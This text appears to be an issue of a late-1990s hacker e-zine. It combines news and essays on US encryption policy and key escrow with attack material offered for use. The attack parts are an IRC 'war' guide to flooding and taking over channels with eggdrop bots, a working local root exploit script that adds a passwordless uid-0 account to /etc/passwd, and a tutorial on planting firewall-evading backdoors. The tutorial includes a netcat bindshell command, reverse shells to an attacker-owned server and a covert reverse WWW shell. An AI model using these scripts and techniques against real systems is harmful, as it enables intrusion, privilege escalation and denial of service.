The administration also has blocked the export of certain advanced encryption
technology that would defeat efforts to conduct digital wiretaps as part of its
fight against international drug cartels and terrorists. But the software industry
continues to fight for the lifting of export restrictions.

In the latest bill, the administration proposes that law enforcement agents have
access - under limited circumstances - to decryption keys held by recovery
agents, which are third-party warehouses of decryption keys that "
unlock"
complex codes that mask the readable form of the data. The proposed law
also allows the government to obtain search warrants to find decryption keys
if they are not held by recovery agents.

The proposed bill would provide new protections for lawful users of
encryption. Currently, according to a summary of the bill that is part of a
proposed letter to House Speaker Dennis Hastert (R-Ill.), there are few laws
guiding how recovery agents treat the decryption keys they store. The bill
would prohibit recovery agents from disclosing the keys or from using the
keys to decrypt data except under certain circumstances, such as when a
lawful heir of a deceased person wants decryption keys to the deceased's
locked information.

The draft bill also prohibits recovery agents from selling or revealing in any
way their customer lists to other parties.

The new protections, however, are not strong enough to avoid the erosion of
privacy rights, said David Sobel, general counsel for the Electronic Privacy
Information Center, an advocacy group based in Washington, D.C. "
It is not a
pro-encryption proposal," he said. "The bottom line is: This is legislation that
would increase law enforcement's ability to access encrypted data."

It also would serve to lay the legal groundwork for eventually outlawing
encryption that does not have decryption keys available to law enforcement,
Sobel said. "
They could say, 'We have established legal procedures in place,
they have been used in several cases. Now our problem is not everybody is
using encryption that provides us with...access,' " he said.

Barbara Simons, president of the California-based Association for Computing
Machinery, said the proposed bill bodes poorly for citizens' privacy. "
Our
lives are moving more and more online," she said. "There's always the risk that
some future government or administration might compromise the rights and
freedoms we enjoy today and take advantage of this technology."

The proposed bill was not a surprise, she said, because FBI Director Louis
Freeh "
has been pushing to have access keys for a long time."

Fred Smith, an attorney in Santa Fe, N.M., who works as a special
prosecutor in computer cases, said he does not believe the administration's
motives are nefarious.

"
I really believe that there's a serious and good faith concern about what we're
going to do if encryption takes off the way it appears to be taking off at the
moment," he said.

A spokesman for DOJ described the proposal as "
pending" and declined to
comment on it.

One Capitol Hill staffer had some concerns. "
I think they are really trying to
hobble how people use encryption," said Ellen Stroud, spokeswoman for
Rep. Bob Goodlatte (R-Va.), sponsor of the Security and Freedom through
Encryption Act, which would relax controls on the export of encryption and
prohibit the government from requiring a backdoor into people's e-mail and
computer files.

Stroud said law enforcement officials examining electronic files as they pursue
criminals in cyberspace could accidentally modify or destroy a company's
legitimate files. "
[The proposal] doesn't provide the needed protection for
companies using encryption," she said. "You're putting yourself at greater
liability [if you use a third-party firm to keep encryption keys.] It's easier for
somebody to search you."

Stroud also said owners of information searched during a criminal investigation
will not necessarily know what information law enforcement officials have
been examining because the draft bill would allow law enforcement officials in
some cases to delay issuing notice of the search warrant.

"
If you want information from me, come to me and get it," Stroud said. "Why
go to somewhere else? Why go to my neighbor? If you have a problem, hit it
straight on."

@HWA


04.0 The lost art of IRC warfare using eggdrop bots
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I found this while looking for a country script for a certain bot on a certain
channel and found it pretty informative...so its here for you to peruse and
perhaps learn a thing or two from the 'other' side of IRC. - Ed


IRC WAR
~~~~~~~~

Fighting with, and against, the Eggdrop Bot!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Stormking


The properly configured Eggdrop bot is one of the most powerful IRC war machines, able to flood,
icmp, nuke, and easily takeover channels. It is also damn near impossible to kill! On this page
I will try to teach you a few of the tricks of configuring and using the Eggdrop Warbot.

By itself Eggdrop is little more than a tough irc client. The heart of the warbot is in the various
tcl scripts designed to wreak havoc on IRC! I'll tell you what they are, where to get them, and how to
set them up for maximum damage. First, lets make sure yer bot's protection is set up properly.

Eggdrop flood protection is set in the config file, way down in the "
###MORE ADVANCED STUFF###" section.
Heres an example from a 1.1.4 bot:

# how many msgs in how many seconds from the same host constitutes a flood? set flood-msg 5:60
# how many public msgs in how many seconds? set flood-chan 10:60
# how many joins/nick changes in how many seconds? set flood-join 5:60
# how many CTCPs in how many seconds? set flood-ctcp 3:60

You can change these to yer liking but I find that the defaults work just fine in most cases. Some bot
masters run an extra tcl for protection such as ctcpprot but I've rarely had a bot flud off with the
defaults. If you feel you need extra protection, its there.

Fighting With Eggdrop

So you got a new bot and you want to be a badass? Well, its easy enough to do. After you have yer bot's
protection squared away, you'll need a few tcl scripts to help you on yer way. I don't have the server
space to offer all the available war tcls but you can get most any of them at ftp://ftp.sodre.net/pub/eggdrop/
in the appropriate scripts section for yer bot version. Here's a list of some of my favorites:

- icmp tcl Fabulous, if yer shell supports ping
- Chantoolz Has its own floods too. For 1.0x
- takeover.tcl Self explanatory. For 1.0x
- massmode1.1a.tcl 1.1x takeover script
- mjoin.tcl A mass join script for botnets
- flud501e.tcl 1.0x fludnet scripts. Rox their asses!
- flud501f-oc.tcl 501e modified for 1.1x bots
- Wardrop.tcl Most everything combined into one script!


There are also a few advanced Unix war programs like "
botnuke", "ssping", and "pepsi" but they require root
access so almost noone can use them. If you have root access, you likely don't need me to tell you how to play
war on Unix! The same goes for the fabled "
spoofers", if you have them, you know how to use them.

OK, now that we have them, how do we use them? Well, most have their own help files. Use them. Anytime you are
planning on loading a script you should always open it in an editor to see if there is anything you need to set
before loading it. Now's a good time to look the script over for the basic commands, and the help
commands! For example, the help file in takeover.tcl is accessed with the command "
.thelp". This is a typical usage.
Sometimes there are settings for which user flag will be required to use the tcl. Most default to +m but you can
change that. My recommendation is to leave it as +m or even +n. Don't let all yer users access your bot's war stuff
unless you want problems with opers.

Let's talk a little about icmp.tcl. This script rox, if you can use it. Unfortunately most shells don't allow ping
or allow only very limited pinging. Its easy to find out if you got lucky.... Just load the script, no editing needed
for the test. In dcc type "
.set icmp 1". Now get someone's dns addy (the numeric one, do "/dns nick" in mIRC) and
type "
.icmp addy", putting the dns addy instead of the word "addy" of course.... Your bot will do one of several
things. Most likely it will say "
Sorry, this shell does not support ping". If it does, yer s.o.l., unload the script.
It might, however, say "
now icmp flooding". If it floods, watch yer victim (or use yer own dns for the test) and see if
he poofs. If he drops off within a few minutes you are one of the lucky ones! If not, your ping is limited to a useless
level. The help file for icmp.tcl is "
icmp".

Another kewl script is mjoin.tcl. Its a botnet mass join/part script. Its usage is real simple, just load it and type
"
.mjoin #channel". Every bot on yer net which is running this script will join that channel. Use ".mpart #channel" to
get them out. This script can be loads of fun but use it carefully as some people don't care for their bots being
jerked into strange channels. Those people, of course, shouldn't run this tcl but some do......

The king of the Eggdrop war scripts is flud.tcl, available in various versions. The ones I prefer are available above.
Use 501e for 1.0x bots and 501f for 1.1x. 501e comes complete with 2 versions, a standard -oc version and a +oc version.
The +oc (stands for oper-check) will check the victim before fludding and abort fluds on opers, a damn good idea!

There is a bit more to this tcl, both in setup and use, than most of the others. To get started open the tcl in any
editor EXCEPT PICO (pico doesn't like long lines). You will see these settings at the top:

# set flag1 "
e" ;# Flag suggested for fludflag.
set fludword "
flud" ;# Word to use for fluding
set fludflag "
m" ;# Flag required for fluding.
set fludver "
501-e" ;# Flud Version. DON'T Change(I'll kill you if you do)!
set fludmax 10 ;# Max times to flud.
set fluddef 5 ;# Default flud times.
set fludnap45 ;# Leave this at 45 to keep the net in synch!
set fludnet "
EFnet" ;# Net you are on.
set fludact 1 ;# Flud on or off? (0/1)
set ircnick "" ;# Define your IRC nickname here. EXTREME PROTECTION!
set fludnick 0 ;# Change to 1 to Enable Nick Changes during fludz.

The first one, #set flag1 "
e", you have to uncomment if you want to use it. It gives users a seperate flag if they are
allowed to flud. I never use this, I just leave the fludflag at "
m", allowing any master to flud. The only settings you
might need to change here are the fludnet, ircnick, and fludnick.

Fludnet, obviously, should be set to the network yer bot is on. Ircnick allows 1.0x bots to have a different nick on the
botnet and on irc, a good idea in my opinion. 1.1x allows you to set "
botnet nick" in the config file so its not needed here.
Fludnick is an interesting feature, very useful but somewhat annoying. It changes yer bot's nick during fluds to a random
nick, such as SJYT233, then changes it back again after the flud. This can save you from k-lines when the victim sends his log
to an oper but can be a bitch in a busy channel. I always set fludnick 1. All my bots flud and I have very few k-lines. Its up
to you!

OK, once you have these things set its time to learn how to use flud. The help file for flud.tcl is "
.fludhelp". You will need
it. There are many types of fluds available, each useful in certain situations.

The basic syntax for fluds is "
.flud/ nick /# of times/ type of flud". In other words, ".flud butthead 10 15" would flud
butthead 10 times with a type 15 flud, a "
Boom" echo flud. Always use 10 for the number of lines as most fludbots are set for a
maximum of 10. If my victim is a standard mIRC client I like to start with the Boom flud. If there are above 30 fludbots available
he will usually drop. If he doesn't drop, he may be running an advanced mIRC script and be basically un-fludable. Against bots I
use a "
4" or clientinfo flud. Sometimes it works. Another kewl flud is the "22" or privmsg flud. This one opens a bunch of little
chat windows on yer victims screen. Not very effective but annoying as hell! Experiment, find yer own favorites.

A few other useful commands are "
.fludbots", which tells you how many bots will flud, and ".last" which tells who made the last
flud. Set yer console to +5 to see flud results and progress. Always remember the main rule of fludding, do a /whois on yer victim
before fludding. DO NOT EVER flud irc operators. To do so risks not only yer own bots but all fludbots on the net. Most botnets
will kick you off for fludding an oper. Remember this. You have been warned.

Fighting Against Eggdrop

Since Eggdrops are UNIX processes they are invincible to standard nuking and such things as will easily kill a Windoze client. A
strong icmp, such as from a T3, will kill a bot but thats about it. This assumes, of course, that yer bot is on a solid shell
(Win-Eggs are NOT included). I've also had limited success with an old DOS based proggie called Flash. Most Eggdrops don't blink at
this but a few will drop. Its worth a try if you need to kill an Eggdrop.

If you have a good fludnet behind you (say 50 or more fludbots) you can sometimes drop an Egg with a standard flud. I find that
clientinfo fluds (usually flud type 4) work best against Eggdrops. Again, most won't blink but a few will fall. You can also try a
good nuker set for non-standard protocols like "
host unreachable". If these things don't work yer likely stuck with waiting and
hoping the bot's shell goes down so you can jump in the channel and quickly kill the other users, grabbing ops before the bot returns.

In Conclusion

Many people nowadays say things like "
IRC war is lame" or "the days of IRC war are over". Well, lame it may be, but dead it certainly
isn't. I am a firm believer in peace on Earth, and on IRC, but I also believe that peace is best maintained, in both cases, through
superior firepower.


@HWA


05.0 Finally a working redhat 5.2 local exploit - From BlackBox issue #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by icesk

HAPPY_FILE="
/etc/passwd"
MAGIC_FILE="
/tmp/.font-unix"
MAGIC_USER="
1C3SK"
LOGIN=`which login`
ln -s $HAPPY_FILE $MAGIC_FILE
echo "
made symlink;" `ls -l $MAGIC_FILE`

while (HAPPY_FILE=HAPPY_FILE); do
sleep 2;
if [ -w $HAPPY_FILE ]; then
echo $MAGIC_USER"
::0:0::/:/bin/sh:"
echo $MAGIC_USER"
::0:0::/:/bin/sh:" >> /etc/passwd
$LOGIN $MAGIC_USER
exit
fi; done
fi
done

@HWA

06.0 The state of crypto today
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hackernews.com/

contributed by Brian Oblivion
Cyberspace Electronic Security Act, CALEA, OECD, The
Wassenaar Arrangement, SAFE, HR-2616, S798,
HR-2617, UCITA, and on and on and on. Just what the
hell is going on? The government wants crypto controls
and the public doesn't.

Buffer Overflow
http://www.hackernews.com/orig/buffero.html


The State of Crypto Policy Today: If you have
nothing to hide...


By: Brian Oblivion
L0pht Heavy Industries

The World remains forever changed by the promise of
international telecommunications. For the past 3 decades
we have enjoyed an ever growing communications
explosion providing a mechanism for the free flow of
information internationally. With early communications
systems, Governments could easily setup listening posts
on international links before exiting the country via
undersea cable or satellite uplinks. Prior to the mid-1980's
the resources to protect communications via cryptography
were cost prohibitive and physically constraining.

Privacy is power, therefore it must be regulated.

Today, the proliferation of high-performance, low-power,
low-cost micro-processors have opened the door to build
cryptographic protection into all communication systems.
This would render existing governmental listening outposts
obsolete. We know this is true, due to the scrambling at
hand on curtailing the proliferation of strong encryption
systems and software. The intelligence communities have
noticed a sharp increase in encrypted traffic across the
communications networks of the world. This originally
prompted the US (United States) to advertise the use of
Key Escrow/Recovery encryption, where the keys used to
protect information would be stored by a trusted third
party. Later, a key could "
lawfully" be obtained to decrypt
stored files or communications in real-time once protected
by that key.

International and domestic opposition to Key
escrow/recovery systems has seemed to triumph in
Europe and most of the world. The OECD (Organization for
Economic Cooperation

  
and Development), a Paris-based
international body of 29 countries, resisted lobbying by
the US Department of Justice, FBI and NSA to endorse
key escrow/recovery systems. The European Union is a
staunch opponent to Key Escrow regimes and is presently
removing inter-union restrictions on encryption products,
leading the way for other countries to adopt privacy
focused strategies.

In addition to OECD, The Wassenaar Arrangement, a 32
country body, sets export controls for conventional
weapons and sensitive dual-use goods and technologies.
The US successfully lobbies this organization, and uses it
to assert its crypto policy on an international scale. The
bulk of the restrictions on dual-use goods and
technologies are uncannily similar to those which are
promulgated by the United States. Recently the
Arrangement increased export restrictions on encryption
products with 64-bit or greater key sizes. In light of this
new restriction, many countries have voiced their
opposition to this change in policy and plan on not
adopting the new restriction.

While no country is bound by any of these agreements,
they are encouraged to adopt the guidelines set forth by
these bodies. When countries fail to adequately interpret
the guidelines to be in line with US interpretation,
diplomatic consultation results. Recently Janet Reno, US
Attorney General, wrote the chancellor of Germany's
Federal Secretary of Justice to restrict the distribution of
"public domain" encryption products. It can be surmised
that the position of the US is to petition others to remove
all public domain encryption software from distribution
servers currently on the Internet.

As a direct result of this international collaboration of
encryption policy, the US has recently published its policy
on encryption usage, as House Resolution HR-2616. The
policy is mostly well founded, and while still not relaxing
encryption export controls on encryption bit lengths over
64-bit, it still allows US Citizens to use any encryption
they should choose without mandating key escrow
mechanisms.

" ...it shall be lawful for any person within any State and
for any United States person to use any encryption
product, regardless of encryption algorithm selected,
encryption bit length chosen, or implementation technique
or medium used."


Hopefully the public at large will act responsibly with
encryption technology. As with the current view of
firearms, this freedom is likely to be short lived.

Nowhere in the document does it discuss the ramifications
of keeping keys in tamper-responsive hardware. Nor does
it discuss the ramifications of reverse-engineering
cryptographic implementations. It can be read that as
long as you do not decrypt someone's communications or
medium without their consent you are exempt from the
laws referenced therein. There is also exclusion for
encryption products and services which are used solely for
access control, digital signatures, authentication or similar
purposes. This does allow the decryption of passwords,
and the like for security auditing and other such practices.

However, Government encryption use is called to use
escrowed cryptography, as well as are government
contractors engaged in contract work for the government.
This is actually more of a blessing than an impediment,
where the government at least will have to continue to
operate responsibly.

The provision still exists where all investigations thwarted
by the use of encryption will be recorded by the Attorney
General, and maintained in classified form. The results of
these findings will undoubtedly sway future addendums to
the current policy toward encryption.

The Security and Freedom through Encryption Act (SAFE),
once a very liberating legislative initiative, has since come
under attack by law enforcement and the intelligence
community. The original goal of SAFE was to relax all
exportation restrictions regardless of encryption key
length. However, the restrictions are now back in the Act,
with exceptions for key lengths of 64 bits or less. All other
encryption software must first be subject to governmental
review before permission can be granted for export.

The export restriction on key length is to be set by a
newly formed Encryption Export Advisory board, which
shall be comprised of a chairman under the Secretary of
Commerce for Export Administration. Seven other
individuals appointed by the President representative of
the NSA, CIA, the Office of the President, and four from
the private sector who have expertise in the information
security field. The board is to report to the president
every 30 days on what encryption technology is suitable
for export. The president can still override any
recommendation they may come up with.

The SAFE act continues prohibition on Federal or State
governmental mandated key escrow systems. A provision
stating that encrypted communications alone is not
"probable cause" to obtain a search warrant to request
the cleartext of said communications is a big win for
privacy advocates. It blocks a blanket probable cause to
eavesdrom on all communications, once the majority of
traffic is encrypted.

There are some extra penalties for using encryption to
hide "criminal" activity. One can realize that this may
become immaterial once it becomes the exception to not
encrypt your communications channels or your storage
mediums. Especially as the trend for hidden and low level
crypto systems is on the rise.

Another disturbing attribute is the mandatory, one-time
15-day technical review of your algorithms/equipment with
the Secretary of Commerce. There are some specific
restrictions for equipment which can be used for military
or intelligence end use, or which may be used for terrorist
organizations. It would seem that the definition of what
can be construed as such equipment can be quite broad
and applied to almost all encryption technologies.

As with the US Crypto Policy house resolution, a
committee to research buggered prosecutions due to the
employment of encryption technologies, is to be
established. The database will be 'classified', and
accessible by appropriate law enforcement agencies. The
results of this investigation will undoubted be used as a
case to repeal the prohibition of mandated key escrow
systems or a change in export policies.

This bill has been introduced into the senate as the
PROTECT Act of 1999, S798 IS.

Money is power, therefore we are Taxed.

HR 2617, "To amend the Internal Revenue Code of 1986 to
allow a tax credit for development costs of encryption
products with plaintext capability without the user's
knowledge."


There is a move in Congress (HR 2617) to alter the
existing tax law to allow corporations which develop and
implement encryption technologies a tax deduction. This
tax deduction is not a reward for a high level of security,
but rather, if the system has the capability of escrowing
keys used in the system. In order for this strategy to
work, taxes would continue to rise, thereby aiding those
who conform to . The legitimate basis for this Resolution
may be to stimulate development to support the US
Governments own request for Key escrowed/recovery
systems for its use.

Privacy is privilege, therefore communications are
supervised.

To further understand the commitment the US
Government has on domestic intelligence dominance, the
Communications Assistance for Law Enforcement ACT
(CALEA), which will provide law enforcement agencies
cleartext or clearvoice in near real-time without the
endusers knowledge, is clearing hurdle after hurdle. CALEA
was once opposed by the telecommunications industry,
but now that the Federal Government has removed the
monetary burden, from industry to the government, almost
all dissension has been quelled.

Performing such a wiretap is permitted only by a court
order. But with all new technology, remote capabilities and
ease of use will undoubtedly provide some risk
unauthorized monitoring of otherwise private
communications. Another possibility is during emergency
war powers or some other crisis, the inconvenience of
obtaining a court order to perform a wiretap could be
waived by a predatorial government, resulting in broad,
undetectable eavesdropping capabilities. To thwart such
activity, personal encryption technology will still be
required to circumvent the buggered, state sponsored
systems.

Knowledge is power, therefore it must be controlled.

In the US, The National Conference of Commissioners for
Uniform State Laws (NCCUSL) has approved and adopted
the Uniform Computer Information Transactions Act
(UCITA). While this document has been criticized publicly
by Attorney Generals from various states, some of the
flaws are detrimental to security applications and condone
poor programming practices.

Even after cryptographic algorithms are verified to be
relatively secure at a certain point in time, the
implementation of the overall system utilizing the algorithm
can be flawed. One must push software's bounds of
normal operations to flesh out any potentially revealing
error conditions. Using software outside of it's intended
use is considered a breach of contract, and prohibited by
the UCITA.

There are also stipulations for publicly posting criticizing
statements against faulty software. As security groups
have proven, many times security holes are only
addressed once widebanded to a software company's
peers and customers. Cryptographic implementations must
be allowed public scrutiny and analysis by ones peers. An
implementation steeped in secrecy is usually flawed and
obfuscated to prevent the revelation of such flaws.
Removing the service of independent analysis will degrade
the overall state of security in the industry, leaving the
holes in the hands of manditory federal reviewers.

As we move into the next millennium the topic of
encryption will continue to strike up heated debate
between Intelligence Communities and liberty advocates.
The world is mostly comfortable to give up its privacy for
a little security. This is usually done in comfortable
political climates. Should that climate ever change, we will
have given Government the keys to our lives, and the
ability to keep its interests above and beyond the will its
subjects. The cryptographic debate boils down to: the
ability to communicate without the fear of government
intrusion, or the possibility for all of your communications
to be intercepted by an uninvited third party. If you have
nothing to hide...

OCED Cryptography Policy
http://www.oecd.org/dsti/sti/it/secur/prod/e-crypto.htm

Cryptography and Liberty 1999
http://www2.epic.org/reports/crypto1999.html

UCITA
http://www.law.upenn.edu/bll/ulc/ucita/citam99.htm

EPIC Cryptographic Policy Review
http://www.epic.org/crypto

@HWA

07.0 Using a backdoor in a firewalled system
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[ http://www.rootshell.com/ ]

-------------------------[ Placing Backdoors Through Firewalls


--------[ van Hauser / THC <vh@reptile.rug.ac.be>




----[ Introduction


This article describes possible backdoors through different firewall
architectures. However, the material can also be applied to other
environments to describe how hackers (you?) cover their access to a system.

Hackers often want to retain access to systems they have penetrated
even in the face of obstacles such as new firewalls and patched
vulnerabilities. To accomplish this the attackers must install a
backdoor which a) does it's job and b) is not easily detectable. The
kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of
intrusion is included, so have fun.




----[ Firewall Architectures


There are two basic firewall architectures and each has an enhanced version.

Packet Filters:
This is a host or router which checks each packet against an
allow/deny ruletable before routing it through the correct
interface. There are very simple ones which can only filter
from the origin host, destination host and destination port, as
well as good ones which can also decide based on incoming interface,
source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux
machine with firewalling activated (ipfwadm).

Stateful Filters: This is the enhanced version of a packet filter. It
still does the same checking against a rule table and only
routes if permitted, but it also keeps track of the state
information such as TCP sequence numbers. Some pay attention
to application protocols which allows tricks such as only
opening ports to the interiour network for ftp-data channels
which were specified in a permitted ftp session. These
filters can (more or less) get UDP packets (f.e. for DNS and
RPC) securely through the firewall. (Thats because UDP is a
stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software,
a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways: A proxy as a firewall host is simply
any server which has no routing activated and instead has
proxy software installed. Examples of proxy servers which may
be used are squid for WWW, a sendmail relay configuration
and/or just a sockd.

Application Gateways:
This is the enhanced version of a proxy. Like a proxy, for every
application which should get through the firewall a software must
be installed and running to proxy it. However, the application
gateway is smart and checks every request and answer, f.e. that
an outgoing ftp only may download data but not upload any, and that
the data has got no virus, no buffer overflows are generated in
answers etc. One can argue that squid is an application
gateway, because it does many sanity checks and let you filter
stuff but it was not programmed for the installation in a secure
environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall
toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firwalls,
which means they've got more than just one type implemented; for
example the IBM Firewall is a simple packet filter with socks and a
few proxies. I won't discuss which firewall product is the best,
because this is not a how-to-by-a-firewall paper, but I will say this:
application gateways are by far the most secure firewalls,
although money, speed, special protocols, open network policies,
stupidity, marketing hype and bad management might rule them out.




----[ Getting in

Before we talk about what backdoors are the best for which firewall
architecture we should shed a light on how to get through a firewall
the first time. Note that getting through a firewall is not a plug-n-play
thing for script-kiddies, this has to be carefully planned and done.

The four main possibilities:

Insider:
There's someone inside the company (you, girlfriend, chummer)
who installs the backdoor. This is the easiest way of course.

Vulnerable Services:
Nearly all networks offer some kind of services,
such as incoming email, WWW, or DNS. These may be on the
firewall host itself, a host in the DMZ (here: the zone in front
of the firewall, often not protected by a firewall) or on an internal
machine. If an attacker can find a hole in one of those services,
he's got good chances to get in. You'd laugh if you saw how many
"firewalls" run sendmail for mail relaying ...

Vulnerable External Server:
People behind a firewall sometimes work on
external machines. If an attacker can hack these, he can
cause serious mischief such as the many X attacks if the
victim uses it via an X-relay or sshd. The attacker could
also
send fake ftp answers
to overflow a buffer in the ftp client software, replace a gif
picture on a web server with one which crashs netscape and
executes a command (I never checked if this actually works, it
crashs, yeah, but I didn't look through this if this is really
an exploitable overflow). There are many possibilities with
this but it needs some knowledge about the company. However,
an external web server of the company is usually a good start.
Some firewalls are configured to allow incoming telnet from
some machines, so anyone can sniff these and get it. This is
particulary true for the US, where academic environments and
industry/military work close together.

Hijacking Connections:
Many companies think that if they allow incoming telnet with
some kind of secure authentication like SecureID (secure algo?, he)
they are safe. Anyone can hijack these after the authentication and
get in ... Another way of using hijacked connections is to modify
replies in the protocol implementation to generate a buffer
overflow (f.e. with X).

Trojans:
Many things can be done with a trojan horse.
This could be a gzip file which generates a buffer overflow
(well, needs an old gzip to be installed), a tar file which
tampers f.e. ~/.logout to execute something, or an executable
or source code which was modified to get the hacker in somehow.
To get someone running this, mail spoofing could be used or
replacing originals on an external server which internal employees
access to update their software regulary (ftp xfer files and www
logs can be checked to get to know which files these are).




----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in
the firewall segment, because these machines are usually monitored and
checked regulary. It's the internal machines which are usually unprotected
and without much administration and security checks.

I will now talk about some ideas of backdoors which could be implemented.
Note that programs which will/would run on an stateful filter will of course
work with a normal packet filter too, same for the proxy. Ideas for an
application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those
which can be used by a hacker anytime he wishes, a "passive" one triggers
itself by time/event so an attacker has to wait for this to happen.

Packet Filters:
It's hard to find a backdoor which gets through this one but does
not work for any other. The few ones which comes into my mind
is a) the ack-telnet. It works like a normal telnet/telnetd except
it does not work with the normal tcp handshake/protocol but uses
TCP ACK packets only. Because they look like they belong to an
already established (and allowed) connection, they are permitted.
This can be easily coded with the spoofit.h of Coder's Spoofit
project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel
with icmp echo/reply packets. But some coding would be needed to
to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://r3wt.base.org look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening
router/firewall let any incoming tcp connection from the source port
20 to a highport (>1023) through to allow the (non-passive) ftp
protocol to work. "netcat -p 20 target port-of-bindshell" is the
fastest solution for this one.

Stateful Filters:
Here a hacker must use programs which initiates the connection from
the secure network to his external 0wned server.
There are many out there which could be used:
active: tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's
a legtimitate program on a computer and it encrypts the
datastream).

passive: netcat compiled with the execute option and run with a
time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package does the same.

Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all those stuff
for the stateful filter and "socksify" them. (www.socks.nec.com)
For more advanced tools you'd should take a look at the application
gateway section.

Application Gateways:
Now we get down to the interesting stuff. These beasts can be
intelligent so some brain is needed.
active: (re-)placing a cgi-script on the webserver of the company,
which allows remote access. This is unlikely because it's
rare that the webserver is in the network, not monitored/
checked/audited and accessible from the internet. I hope
nobody needs an example on such a thing ;-)
(re-placing) a service/binary on the firewall. This is
dangerous because those are audited regulary and sometimes
even sniffed on permanent ...
Loading a loadable module into the firewall kernel wich
hides itself and gives access to it's master. The best
solution for an active backdoor but still dangerous.

passive: E@mail - an email account/mailer/reader is configured in a
way to extract hidden commands in an email (X-Headers with
weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine
does http requests to the internet, but the requests are
in real the answers of commands which were issued by a
rogue www server in a http reply. This nice and easy beast
is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and
replies. Disadvantage is that it can not carry much data.
(http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this
example needs still much coding to be any effective)




----[ Backdoor Example: The Reverse WWW Shell


This backdoor should work through any firewall which has got the security
policy to allow users to surf the WWW (World Wide Waste) for information
for the sake and profit of the company.
For a better understanding take a look at the following picture and try
to remember it onwards in the text:

+--------+ +------------+ +-------------+
|internal|--------------------| FIREWALL |--------------|server owned |
| host | internal network +------------+ internet |by the hacker|
+--------+ +-------------+
SLAVE MASTER

Well, a program is run on the internal host, which spawns a child every day
at a special time. For the firewall, this child acts like a user, using his
netscape client to surf on the internet. In reality, this child executes
a local shell and connects to the www server owned by the hacker on the
internet via a legitimate looking http request and sends it ready signal.
The legitimate looking answer of the www server owned by the hacker are
in reality the commands the child will execute on it's machine it the
local shell. All traffic will be converted (I'll not call this "encrypted",
I'm not Micro$oft) in a Base64 like structure and given as a value for
a cgi-string to prevent caching.
Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krjVAEfg HTTP/1.0

Master replies with
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the
shell, the answer is an encoded "ls" command from the hacker on the
external server (MASTER).
Some gimmicks:
The SLAVE tries to connect daily at a specified time to the MASTER if
wanted; the child is spawned because if the shell hangs for whatever
reason you can check & fix the next day; if an administrator sees connects
to the hacker's server and connects to it himself he will just see a
broken webserver because there's a Token (Password) in the encoded
cgi GET request; WWW Proxies (f.e. squid) are supported; program masks
it's name in the process listing ...

Best of all: master & slave program are just one 260-lines perl file ...
Usage is simple: edit rwwwshell.pl for the correct values,
execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl"
on the MASTER just before it's time that the slave tries to connect.

Well, why coding it in perl? a) it was very fast to code, b) it's highly
portable and c) I like it.
If you want to use it on a system which hasn't got perl installed, search
for a similar machine with perl install, get the a3 compiler from the perl
CPAN archives and compile it to a binary. Transfer this to your target
machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE
after my last words. If you've got updates/ideas/critics for it drop me an
email. If you think this text or program is lame, write me at root@localhost.
Check out http://r3wt.base.org for updates.




----[ Security


Now it's an interesting question how to secure a firewall to deny/detect
this. It should be clear that you need a tight application gateway firewall
with a strict policy. email should be put on a centralized mail server,
and DNS resolving only done on the WWW/FTP proxies and access to WWW only
prior proxy authentication. However, this is not enough. An attacker can
tamper the mailreader to execute the commands extracted from the crypted
X-Headers or implement the http authentication into the reverse www-shell
(it's simple). Also checking the DNS and WWW logs/caches regulary with good
tools can be defeated by switching the external servers every 3-20 calls
or use aliases.

A secure solution would be to set up a second network which is
connected to the internet, and the real one kept seperated - but tell
this the employees ...
A good firewall is a big improvement, and also an Intrusion Detection
Systems can help. But nothing can stop a dedicated attacker.




----[ Last Words

Have fun hacking/securing the systems ...
Greets to all guys who like + know me ;-) and especially to those good
chummers I've got, you know who you are.

Ciao...
van Hauser / [THC] - The Hacker's Choice


For further interesting discussions you can email me at vh@reptile.rug.be
with my public pgp key below :

Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
